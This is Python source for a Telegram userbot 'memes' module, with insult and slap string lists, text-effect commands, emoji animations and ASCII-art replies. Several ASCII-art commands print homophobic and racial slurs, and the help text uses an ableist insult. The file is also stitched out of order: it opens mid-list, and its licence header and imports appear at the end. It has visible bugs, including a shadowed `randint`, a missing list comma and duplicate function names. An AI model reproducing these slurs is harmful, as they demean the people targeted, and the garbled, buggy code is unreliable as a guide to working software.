"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"Get back here!",
"Not so fast...",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"Jokes on you, I'm everywhere",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"Go bother someone else, no-one here cares.",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
"\"Oh, look at me! I'm so cool, I can run from a bot!\" - this person",
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
"Legend has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
"Legend has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
HELLOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"‘Sup, homeslice?",
"Howdy, howdy ,howdy!",
"Hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"Hello, sunshine!",
"Hey, howdy, hi!",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"Hey there, freshman!",
"I come in peace!",
"Ahoy, matey!",
"Hiya!",
]
SHGS = [
"┐(´д`)┌",
"┐(´~`)┌",
"┐(´ー`)┌",
"┐( ̄ヘ ̄)┌",
"╮(╯∀╰)╭",
"╮(╯_╰)╭",
"┐(´д`)┌",
"┐(´∀`)┌",
"ʅ(́◡◝)ʃ",
"┐(゚~゚)┌",
"┐('д')┌",
"┐(‘~`;)┌",
"ヘ(´-`;)ヘ",
"┐( -“-)┌",
"ʅ(´◔౪◔)ʃ",
"ヽ(゜~゜o)ノ",
"ヽ(~~~ )ノ",
"┐(~ー~;)┌",
"┐(-。ー;)┌",
r"¯\_(ツ)_/¯",
r"¯\_(⊙_ʖ⊙)_/¯",
r"¯\_༼ ಥ ‿ ಥ ༽_/¯",
"乁( ⁰͡ Ĺ̯ ⁰͡ ) ㄏ",
]
CRI = [
"أ‿أ",
"╥﹏╥",
"(;﹏;)",
"(ToT)",
"(┳Д┳)",
"(ಥ﹏ಥ)",
"(;へ:)",
"(T_T)",
"(πーπ)",
"(T▽T)",
"(⋟﹏⋞)",
"(iДi)",
"(´Д⊂ヽ",
"(;Д;)",
"(>﹏<)",
"(TдT)",
"(つ﹏⊂)",
"༼☯﹏☯༽",
"(ノ﹏ヽ)",
"(ノAヽ)",
"(╥_╥)",
"(T⌓T)",
"(༎ຶ⌑༎ຶ)",
"(☍﹏⁰)。",
"(ಥ_ʖಥ)",
"(つд⊂)",
"(≖͞_≖̥)",
"(இ﹏இ`。)",
"༼ಢ_ಢ༽",
"༼ ༎ຶ ෴ ༎ຶ༽",
]
SLAP_TEMPLATES = [
"{hits} {victim} with a {item}.",
"{hits} {victim} in the face with a {item}.",
"{hits} {victim} around a bit with a {item}.",
"{throws} a {item} at {victim}.",
"grabs a {item} and {throws} it at {victim}'s face.",
"{hits} a {item} at {victim}.", "{throws} a few {item} at {victim}.",
"grabs a {item} and {throws} it in {victim}'s face.",
"launches a {item} in {victim}'s general direction.",
"sits on {victim}'s face while slamming a {item} {where}.",
"starts slapping {victim} silly with a {item}.",
"pins {victim} down and repeatedly {hits} them with a {item}.",
"grabs up a {item} and {hits} {victim} with it.",
"starts slapping {victim} silly with a {item}.",
"holds {victim} down and repeatedly {hits} them with a {item}.",
"prods {victim} with a {item}.",
"picks up a {item} and {hits} {victim} with it.",
"ties {victim} to a chair and {throws} a {item} at them.",
"{hits} {victim} {where} with a {item}.",
"ties {victim} to a pole and whips them {where} with a {item}."
"gave a friendly push to help {victim} learn to swim in lava.",
"sent {victim} to /dev/null.", "sent {victim} down the memory hole.",
"beheaded {victim}.", "threw {victim} off a building.",
"replaced all of {victim}'s music with Nickelback.",
"spammed {victim}'s email.", "made {victim} a knuckle sandwich.",
"slapped {victim} with pure nothing.",
"hit {victim} with a small, interstellar spaceship.",
"quickscoped {victim}.", "put {victim} in check-mate.",
"RSA-encrypted {victim} and deleted the private key.",
"put {victim} in the friendzone.",
"slaps {victim} with a DMCA takedown request!"
]
ITEMS = [
"cast iron skillet",
"large trout",
"baseball bat",
"cricket bat",
"wooden cane",
"nail",
"printer",
"shovel",
"pair of trousers",
"CRT monitor",
"diamond sword",
"baguette",
"physics textbook",
"toaster",
"portrait of Richard Stallman",
"television",
"mau5head",
"five ton truck",
"roll of duct tape",
"book",
"laptop",
"old television",
"sack of rocks",
"rainbow trout",
"cobblestone block",
"lava bucket",
"rubber chicken",
"spiked bat",
"gold block",
"fire extinguisher",
"heavy rock",
"chunk of dirt",
"beehive",
"piece of rotten meat",
"bear",
"ton of bricks",
]
THROW = [
"throws",
"flings",
"chucks",
"hurls",
]
HIT = [
"hits",
"whacks",
"slaps",
"smacks",
"bashes",
]
WHERE = ["in the chest", "on the head", "on the butt", "on the crotch"]
# ===========================================
@register(outgoing=True, pattern=r"^.(\w+)say (.*)")
async def univsaye(cowmsg):
""" For .cowsay module, userbot wrapper for cow which says things. """
arg = cowmsg.pattern_match.group(1).lower()
text = cowmsg.pattern_match.group(2)
if arg == "cow":
arg = "default"
if arg not in cow.COWACTERS:
return
cheese = cow.get_cow(arg)
cheese = cheese()
await cowmsg.edit(f"`{cheese.milk(text).replace("`", "´")}`")
@register(outgoing=True, pattern="^:/$", ignore_unsafe=True)
async def kek(keks):
""" Check yourself ;)"""
uio = ["/", "\\"]
for i in range(1, 15):
time.sleep(0.3)
await keks.edit(":" + uio[i % 2])
@register(outgoing=True, pattern=r"^.coinflip (.*)")
async def coin(event):
r = choice(["heads", "tails"])
input_str = event.pattern_match.group(1)
if input_str:
input_str = input_str.lower()
if r == "heads":
if input_str == "heads":
await event.edit(
"The coin landed on: **Heads**.\nYou were correct.")
elif input_str == "tails":
await event.edit(
"The coin landed on: **Heads**.\nYou weren't correct, try again ..."
)
else:
await event.edit("The coin landed on: **Heads**.")
elif r == "tails":
if input_str == "tails":
await event.edit(
"The coin landed on: **Tails**.\nYou were correct.")
elif input_str == "heads":
await event.edit(
"The coin landed on: **Tails**.\nYou weren't correct, try again ..."
)
else:
await event.edit("The coin landed on: **Tails**.")
@register(pattern="^.slap(?: |$)(.*)", outgoing=True)
async def who(event):
""" slaps a user, or get slapped if not a reply. """
replied_user = await get_user_from_event(event)
if replied_user:
replied_user = replied_user[0]
else:
return
caption = await slap(replied_user, event)
try:
await event.edit(caption)
except BaseException:
await event.edit(
"`Can't slap this person, need to fetch some sticks and stones !!`"
)
async def slap(replied_user, event):
""" Construct a funny slap sentence !! """
user_id = replied_user.id
first_name = replied_user.first_name
username = replied_user.username
if username:
slapped = "@{}".format(username)
else:
slapped = f"[{first_name}](tg://user?id={user_id})"
temp = choice(SLAP_TEMPLATES)
item = choice(ITEMS)
hit = choice(HIT)
throw = choice(THROW)
where = choice(WHERE)
caption = "..." + temp.format(
victim=slapped, item=item, hits=hit, throws=throw, where=where)
return caption
@register(outgoing=True, pattern="^-_-$", ignore_unsafe=True)
async def lol(lel):
""" Ok... """
okay = "-_-"
for i in range(10):
okay = okay[:-1] + "_-"
await lel.edit(okay)
@register(outgoing=True, pattern="^.(yes|no|maybe|decide)$")
async def decide(event):
decision = event.pattern_match.group(1).lower()
message_id = event.reply_to_msg_id if event.reply_to_msg_id else None
if decision != "decide":
r = requests.get(f"https://yesno.wtf/api?force={decision}").json()
else:
r = requests.get(f"https://yesno.wtf/api").json()
await event.delete()
await event.client.send_message(event.chat_id,
str(r["answer"]).upper(),
reply_to=message_id,
file=r["image"])
@register(outgoing=True, pattern="^;_;$", ignore_unsafe=True)
async def fun(e):
t = ";_;"
for j in range(10):
t = t[:-1] + "_;"
await e.edit(t)
@register(outgoing=True, pattern="^.fp$")
async def facepalm(e):
""" Facepalm 🤦♂ """
await e.edit("🤦♂")
@register(outgoing=True, pattern="^.cry$")
async def cry(e):
""" y u du dis, i cry everytime !! """
await e.edit(choice(CRI))
@register(outgoing=True, pattern="^.insult$")
async def insult(e):
""" I make you cry !! """
await e.edit(choice(INSULT_STRINGS))
@register(outgoing=True, pattern="^.cp(?: |$)(.*)")
async def copypasta(cp_e):
""" Copypasta the famous meme """
textx = await cp_e.get_reply_message()
message = cp_e.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await cp_e.edit("`😂🅱️IvE👐sOME👅text👅for✌️Me👌tO👐MAkE👀iT💞funNy!💦`")
return
reply_text = choice(EMOJIS)
# choose a random character in the message to be substituted with 🅱️
b_char = choice(message).lower()
for owo in message:
if owo == " ":
reply_text += choice(EMOJIS)
elif owo in EMOJIS:
reply_text += owo
reply_text += choice(EMOJIS)
elif owo.lower() == b_char:
reply_text += "🅱️"
else:
if bool(getrandbits(1)):
reply_text += owo.upper()
else:
reply_text += owo.lower()
reply_text += choice(EMOJIS)
await cp_e.edit(reply_text)
@register(outgoing=True, pattern="^.vapor(?: |$)(.*)")
async def vapor(vpr):
""" Vaporize everything! """
reply_text = list()
textx = await vpr.get_reply_message()
message = vpr.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await vpr.edit("`Give some text for vapor!`")
return
for charac in message:
if 0x21 <= ord(charac) <= 0x7F:
reply_text.append(chr(ord(charac) + 0xFEE0))
elif ord(charac) == 0x20:
reply_text.append(chr(0x3000))
else:
reply_text.append(charac)
await vpr.edit("".join(reply_text))
@register(outgoing=True, pattern="^.str(?: |$)(.*)")
async def stretch(stret):
""" Stretch it."""
textx = await stret.get_reply_message()
message = stret.text
message = stret.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await stret.edit("`GiiiiiiiB sooooooomeeeeeee teeeeeeext!`")
return
count = randint(3, 10)
reply_text = sub(r"([aeiouAEIOUaeiouAEIOUаеиоуюяыэё])", (r"\1" * count),
message)
await stret.edit(reply_text)
@register(outgoing=True, pattern="^.zal(?: |$)(.*)")
async def zal(zgfy):
""" Invoke the feeling of chaos. """
reply_text = list()
textx = await zgfy.get_reply_message()
message = zgfy.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await zgfy.edit(
"`gͫ ̆ i̛ ̺ v͇̆ ȅͅ a̢ͦ s̴̪ c̸̢ ä̸ rͩͣ y͖͞ t̨͚ é̠ x̢͖ t͔͛`"
)
return
for charac in message:
if not charac.isalpha():
reply_text.append(charac)
continue
for _ in range(0, 3):
randint = randint(0, 2)
if randint == 0:
charac = charac.strip() + \
choice(ZALG_LIST[0]).strip()
elif randint == 1:
charac = charac.strip() + \
choice(ZALG_LIST[1]).strip()
else:
charac = charac.strip() + \
choice(ZALG_LIST[2]).strip()
reply_text.append(charac)
await zgfy.edit("".join(reply_text))
@register(outgoing=True, pattern="^.hi$")
async def hoi(hello):
""" Greet everyone! """
await hello.edit(choice(HELLOSTR))
@register(outgoing=True, pattern="^.owo(?: |$)(.*)")
async def faces(owo):
""" UwU """
textx = await owo.get_reply_message()
message = owo.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await owo.edit("` UwU no text given! `")
return
reply_text = sub(r"(r|l)", "w", message)
reply_text = sub(r"(R|L)", "W", reply_text)
reply_text = sub(r"n([aeiou])", r"ny\1", reply_text)
reply_text = sub(r"N([aeiouAEIOU])", r"Ny\1", reply_text)
reply_text = sub(r"\!+", " " + choice(UWUS), reply_text)
reply_text = reply_text.replace("ove", "uv")
reply_text += " " + choice(UWUS)
await owo.edit(reply_text)
@register(outgoing=True, pattern="^.react$")
async def react_meme(react):
""" Make your userbot react to everything. """
await react.edit(choice(FACEREACTS))
@register(outgoing=True, pattern="^.shg$")
async def shrugger(shg):
r""" ¯\_(ツ)_/¯ """
await shg.edit(choice(SHGS))
@register(outgoing=True, pattern="^.chase$")
async def police(chase):
""" Run boi run, i'm gonna catch you !! """
await chase.edit(choice(CHASE_STR))
@register(outgoing=True, pattern="^.run$")
async def runner_lol(run):
""" Run, run, RUNNN! """
await run.edit(choice(RUNS_STR))
@register(outgoing=True, pattern="^.metoo$")
async def metoo(hahayes):
""" Haha yes """
await hahayes.edit(choice(METOOSTR))
@register(outgoing=True, pattern="^Oof$")
async def Oof(e):
t = "Oof"
for j in range(15):
t = t[:-1] + "of"
await e.edit(t)
@register(outgoing=True, pattern="^.10iq$")
async def iqless(e):
await e.edit("♿")
@register(outgoing=True, pattern="^.fuck$")
async def iqless(e):
await e.edit("🖕🖕🖕🖕🖕🖕🖕🖕\n🖕🖕🖕🖕🖕🖕🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕🖕🖕🖕🖕\n🖕🖕🖕🖕🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕")
@register(outgoing=True, pattern="^.bye$")
async def iqless(e):
await e.edit("Kek thx bye")
@register(outgoing=True, pattern="^.moon$")
async def moon(event):
deq = deque(list("🌗🌘🌑🌒🌓🌔🌕🌖"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.earth$")
async def earth(event):
deq = deque(list("🌏🌍🌎🌎🌍🌏🌍🌎"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.clock$")
async def clock(event):
deq = deque(list("🕙🕘🕗🕖🕕🕔🕓🕒🕑🕐🕛"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.rain$")
async def rain(event):
deq = deque(list("☀️🌤⛅️🌥☁️🌧⛈"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.love$")
async def love(event):
deq = deque(list("❤️🧡💛💚💙💜🖤💕💞💓💗💖💘💝"))
try:
for x in range(32):
await sleep(0.1)
await event.edit("".join(deq))
deq.rotate(1)
except BaseException:
return
@register(outgoing=True, pattern="^.mock(?: |$)(.*)")
async def spongemocktext(mock):
""" Do it and find the real fun. """
reply_text = list()
textx = await mock.get_reply_message()
message = mock.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await mock.edit("`gIvE sOMEtHInG tO MoCk!`")
return
for charac in message:
if charac.isalpha() and randint(0, 1):
to_app = charac.upper() if charac.islower() else charac.lower()
reply_text.append(to_app)
else:
reply_text.append(charac)
await mock.edit("".join(reply_text))
@register(outgoing=True, pattern="^.clap(?: |$)(.*)")
async def claptext(memereview):
""" Praise people! """
textx = await memereview.get_reply_message()
message = memereview.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await memereview.edit("`Hah, I don't clap pointlessly!`")
return
reply_text = "👏 "
reply_text += message.replace(" ", " 👏 ")
reply_text += " 👏"
await memereview.edit(reply_text)
@register(outgoing=True, pattern="^.bt$")
async def bluetext(bt_e):
""" Believe me, you will find this useful. """
if await bt_e.get_reply_message() and bt_e.is_group:
await bt_e.edit(
"/BLUETEXT /MUST /CLICK.\n"
"/ARE /YOU /A /STUPID /ANIMAL /WHICH /IS /ATTRACTED /TO /COLOURS?")
@register(outgoing=True, pattern=r"^.f (.*)")
async def payf(event):
paytext = event.pattern_match.group(1)
pay = "{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}".format(
paytext * 8, paytext * 8, paytext * 2, paytext * 2, paytext * 2,
paytext * 6, paytext * 6, paytext * 2, paytext * 2, paytext * 2,
paytext * 2, paytext * 2)
await event.edit(pay)
@register(outgoing=True, pattern="^.lfy (.*)")
async def let_me_google_that_for_you(lmgtfy_q):
textx = await lmgtfy_q.get_reply_message()
qry = lmgtfy_q.pattern_match.group(1)
if qry:
query = str(qry)
elif textx:
query = textx
query = query.message
query_encoded = query.replace(" ", "+")
lfy_url = f"http://lmgtfy.com/?s=g&iie=1&q={query_encoded}"
payload = {'format': 'json', 'url': lfy_url}
r = requests.get('http://is.gd/create.php', params=payload)
await lmgtfy_q.edit(f"Here you are, help yourself.\
\n[{query}]({r.json()['shorturl']})")
@register(pattern=r".scam(?: |$)(.*)", outgoing=True)
async def scam(event):
""" Just a small command to fake chat actions for fun !! """
options = [
'typing', 'contact', 'game', 'location', 'voice', 'round', 'video',
'photo', 'document', 'cancel'
]
input_str = event.pattern_match.group(1)
args = input_str.split()
if len(args) == 0: # Let bot decide action and time
scam_action = choice(options)
scam_time = randint(30, 60)
elif len(args) == 1: # User decides time/action, bot decides the other.
try:
scam_action = str(args[0]).lower()
scam_time = randint(30, 60)
except ValueError:
scam_action = choice(options)
scam_time = int(args[0])
elif len(args) == 2: # User decides both action and time
scam_action = str(args[0]).lower()
scam_time = int(args[1])
else:
await event.edit("`Invalid Syntax !!`")
return
try:
if (scam_time > 0):
await event.delete()
async with event.client.action(event.chat_id, scam_action):
await sleep(scam_time)
except BaseException:
return
@register(pattern=r".type(?: |$)(.*)", outgoing=True)
async def typewriter(typew):
""" Just a small command to make your keyboard become a typewriter! """
textx = await typew.get_reply_message()
message = typew.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await typew.edit("`Give a text to type!`")
return
sleep_time = 0.03
typing_symbol = "|"
old_text = ""
await typew.edit(typing_symbol)
await sleep(sleep_time)
for character in message:
old_text = old_text + "" + character
typing_text = old_text + "" + typing_symbol
await typew.edit(typing_text)
await sleep(sleep_time)
await typew.edit(old_text)
await sleep(sleep_time)
@register(outgoing=True, pattern="^.leave$")
async def leave(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`You must Leaving dis Group kek!`")
@register(outgoing=True, pattern="^.fail$")
async def fail(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ `"
"`\n████▌▄▌▄▐▐▌█████ `"
"`\n████▌▄▌▄▐▐▌▀████ `"
"`\n▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ `")
@register(outgoing=True, pattern="^.lol$")
async def lol(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n╱┏┓╱╱╱╭━━━╮┏┓╱╱╱╱ `"
"`\n╱┃┃╱╱╱┃╭━╮┃┃┃╱╱╱╱ `"
"`\n╱┃┗━━┓┃╰━╯┃┃┗━━┓╱ `"
"`\n╱┗━━━┛╰━━━╯┗━━━┛╱ `")
@register(outgoing=True, pattern="^.lool$")
async def lool(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n╭╭━━━╮╮┈┈┈┈┈┈┈┈┈┈\n┈┃╭━━╯┈┈┈┈▕╲▂▂╱▏┈\n┈┃┃╱▔▔▔▔▔▔▔▏╱▋▋╮┈`"
"`\n┈┃╰▏┃╱╭╮┃╱╱▏╱╱▆┃┈\n┈╰━▏┗━╰╯┗━╱╱╱╰┻┫┈\n┈┈┈▏┏┳━━━━▏┏┳━━╯┈`"
"`\n┈┈┈▏┃┃┈┈┈┈▏┃┃┈┈┈┈ `")
@register(outgoing=True, pattern="^.stfu$")
async def stfu(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n██████████████████████████████`"
"`\n██▀▀▀▀████▀▀▀▀████▀▀▀▀▀███▀▀██▀▀█`"
"`\n█──────██──────██───────██──██──█`"
"`\n█──██▄▄████──████──███▄▄██──██──█`"
"`\n█▄────▀████──████────█████──██──█`"
"`\n█▀▀██──████──████──███████──██──█`"
"`\n█──────████──████──███████──────█`"
"`\n██▄▄▄▄█████▄▄████▄▄████████▄▄▄▄██`"
"`\n█████████████████████████████████`")
@register(outgoing=True, pattern="^.gtfo$")
async def gtfo(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n███████████████████████████████ `"
"`\n█▀▀▀▀▀▀▀█▀▀▀▀▀▀█▀▀▀▀▀▀▀█▀▀▀▀▀▀█ `"
"`\n█───────█──────█───────█──────█ `"
"`\n█──███──███──███──███▄▄█──██──█ `"
"`\n█──███▄▄███──███─────███──██──█ `"
"`\n█──██───███──███──██████──██──█ `"
"`\n█──▀▀▀──███──███──██████──────█ `"
"`\n█▄▄▄▄▄▄▄███▄▄███▄▄██████▄▄▄▄▄▄█ `"
"`\n███████████████████████████████ `")
@register(outgoing=True, pattern="^.nih$")
async def nih(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n(\_/)`"
"`\n(•_•)`"
"`\n >🌹 *ini buat kamu`"
"`\n `"
"`\n(\_/)`"
"`\n(•_•)`"
"`\n🌹<\ *tapi boong`")
@register(outgoing=True, pattern="^.fag$")
async def gtfo(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n█████████`"
"`\n█▄█████▄█`"
"`\n█▼▼▼▼▼`"
"`\n█ STFU FAGGOT'S`"
"`\n█▲▲▲▲▲`"
"`\n█████████`"
"`\n ██ ██`")
@register(outgoing=True, pattern="^.taco$")
async def taco(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("\n{\__/}"
"\n(●_●)"
"\n( >🌮 Want a taco?")
@register(outgoing=True, pattern="^.paw$")
async def paw(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`(=ↀωↀ=)")
@register(outgoing=True, pattern="^.tf$")
async def tf(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("(̿▀̿ ̿Ĺ̯̿̿▀̿ ̿)̄ ")
@register(outgoing=True, pattern="^.gey$")
async def gey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
"`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
"`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈NIGGA U GEY`"
"\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.gay$")
async def gey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
"`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
"`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈BAPAQ U GAY`"
"\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.bot$")
async def bot(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("` \n ╲╲╭━━━━╮ \n╭╮┃▆┈┈▆┃╭╮ \n┃╰┫▽▽▽┣╯┃ \n╰━┫△△△┣━╯`"
"`\n╲╲┃┈┈┈┈┃ \n╲╲┃┈┏┓┈┃ `")
@register(outgoing=True, pattern="^.hey$")
async def hey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("\n┈┈┈╱▔▔▔▔╲┈╭━━━━━\n┈┈▕▂▂▂▂▂▂▏┃HEY!┊😀`"
"`\n┈┈▕▔▇▔▔┳▔▏╰┳╮HEY!┊\n┈┈▕╭━╰╯━╮▏━╯╰━━━\n╱▔▔▏▅▅▅▅▕▔▔╲┈┈┈┈`"
"`\n▏┈┈╲▂▂▂▂╱┈┈┈▏┈┈┈`")
@register(outgoing=True, pattern="^.nou$")
async def nou(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈╭╮╭╮\n┈┃┃┃┃\n╭┻┗┻┗╮`"
"`\n┃┈▋┈▋┃\n┃┈╭▋━╮━╮\n┃┈┈╭╰╯╰╯╮`"
"`\n┫┈┈ NoU\n┃┈╰╰━━━━╯`"
"`\n┗━━┻━┛`")
CMD_HELP.update({
"memes":
".cowsay\
\nUsage: cow which says things.\
\n\n:/\
\nUsage: Check yourself ;)\
\n\n-_-\
\nUsage: Ok...\
\n\n;_;\
\nUsage: Like `-_-` but crying.\
\n\n.cp\
\nUsage: Copypasta the famous meme\
\n\n.vapor\
\nUsage: Vaporize everything!\
\n\n.str\
\nUsage: Stretch it.\
\n\n.10iq\
\nUsage: You retard !!\
\n\n.zal\
\nUsage: Invoke the feeling of chaos.\
\n\nOof\
\nUsage: Ooooof\
\n\n.fp\
\nUsage: Facepalm :P\
\n\n.moon\
\nUsage: kensar moon animation.\
\n\n.clock\
\nUsage: kensar clock animation.\
\n\n.hi\
\nUsage: Greet everyone!\
\n\n.coinflip <heads/tails>\
\nUsage: Flip a coin !!\
\n\n.owo\
\nUsage: UwU\
\n\n.react\
\nUsage: Make your userbot react to everything.\
\n\n.slap\
\nUsage: reply to slap them with random objects !!\
\n\n.cry\
\nUsage: y u du dis, i cri.\
\n\n.shg\
\nUsage: Shrug at it !!\
\n\n.run\
\nUsage: Let Me Run, run, RUNNN!\
\n\n.chase\
\nUsage: You better start running\
\n\n.metoo\
\nUsage: Haha yes\
\n\n.mock\
\nUsage: Do it and find the real fun.\
\n\n.clap\
\nUsage: Praise people!\
\n\n.f <emoji/character>\
\nUsage: Pay Respects.\
\n\n.bt\
\nUsage: Believe me, you will find this useful.\
\n\n.type\
\nUsage: Just a small command to make your keyboard become a typewriter!\
\n\n.lfy <query>\
\nUsage: Let me Google that for you real quick !!\
\n\n.decide [Alternates: (.yes, .no, .maybe)]\
\nUsage: Make a quick decision.\
\n\n.scam <action> <time>\
\n[Available Actions: (typing, contact, game, location, voice, round, video, photo, document, cancel)]\
\nUsage: Create fake chat actions, for fun. (Default action: typing)\
\n\n\nThanks to 🅱️ottom🅱️ext🅱️ot (@NotAMemeBot) for some of these."
})
| # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
""" Userbot module for having some fun with people. """
from asyncio import sleep
from random import choice, getrandbits, randint
from re import sub
import time
from collections import deque
import requests
from cowpy import cow
from userbot import CMD_HELP
from userbot.events import register
from userbot.modules.admin import get_user_from_event
# ================= CONSTANT =================
METOOSTR = [
"Me too thanks",
"Haha yes, me too",
"Same lol",
"Me irl",
"Same here",
"Haha yes",
"Me rn",
]
ZALG_LIST = [[
"̖",
" ̗",
" ̘",
" ̙",
" ̜",
" ̝",
" ̞",
" ̟",
" ̠",
" ̤",
" ̥",
" ̦",
" ̩",
" ̪",
" ̫",
" ̬",
" ̭",
" ̮",
" ̯",
" ̰",
" ̱",
" ̲",
" ̳",
" ̹",
" ̺",
" ̻",
" ̼",
" ͅ",
" ͇",
" ͈",
" ͉",
" ͍",
" ͎",
" ͓",
" ͔",
" ͕",
" ͖",
" ͙",
" ͚",
" ",
],
[
" ̍",
" ̎",
" ̄",
" ̅",
" ̿",
" ̑",
" ̆",
" ̐",
" ͒",
" ͗",
" ͑",
" ̇",
" ̈",
" ̊",
" ͂",
" ̓",
" ̈́",
" ͊",
" ͋",
" ͌",
" ̃",
" ̂",
" ̌",
" ͐",
" ́",
" ̋",
" ̏",
" ̽",
" ̉",
" ͣ",
" ͤ",
" ͥ",
" ͦ",
" ͧ",
" ͨ",
" ͩ",
" ͪ",
" ͫ",
" ͬ",
" ͭ",
" ͮ",
" ͯ",
" ̾",
" ͛",
" ͆",
" ̚",
],
[
" ̕",
" ̛",
" ̀",
" ́",
" ͘",
" ̡",
" ̢",
" ̧",
" ̨",
" ̴",
" ̵",
" ̶",
" ͜",
" ͝",
" ͞",
" ͟",
" ͠",
" ͢",
" ̸",
" ̷",
" ͡",
]]
EMOJIS = [
"😂",
"😂",
"👌",
"✌",
"💞",
"👍",
"👌",
"💯",
"🎶",
"👀",
"😂",
"👓",
"👏",
"👐",
"🍕",
"💥",
"🍴",
"💦",
"💦",
"🍑",
"🍆",
"😩",
"😏",
"👉👌",
"👀",
"👅",
"😩",
"🚰",
]
INSULT_STRINGS = [
"Owww ... Such a stupid idiot.",
"Don't drink and type.",
"I think you should go home or better a mental asylum.",
"Command not found. Just like your brain.",
"Do you realize you are making a fool of yourself? Apparently not.",
"You can type better than that.",
"Bot rule 544 section 9 prevents me from replying to stupid humans like you.",
"Sorry, we do not sell brains.",
"Believe me you are not normal.",
"I bet your brain feels as good as new, seeing that you never use it.",
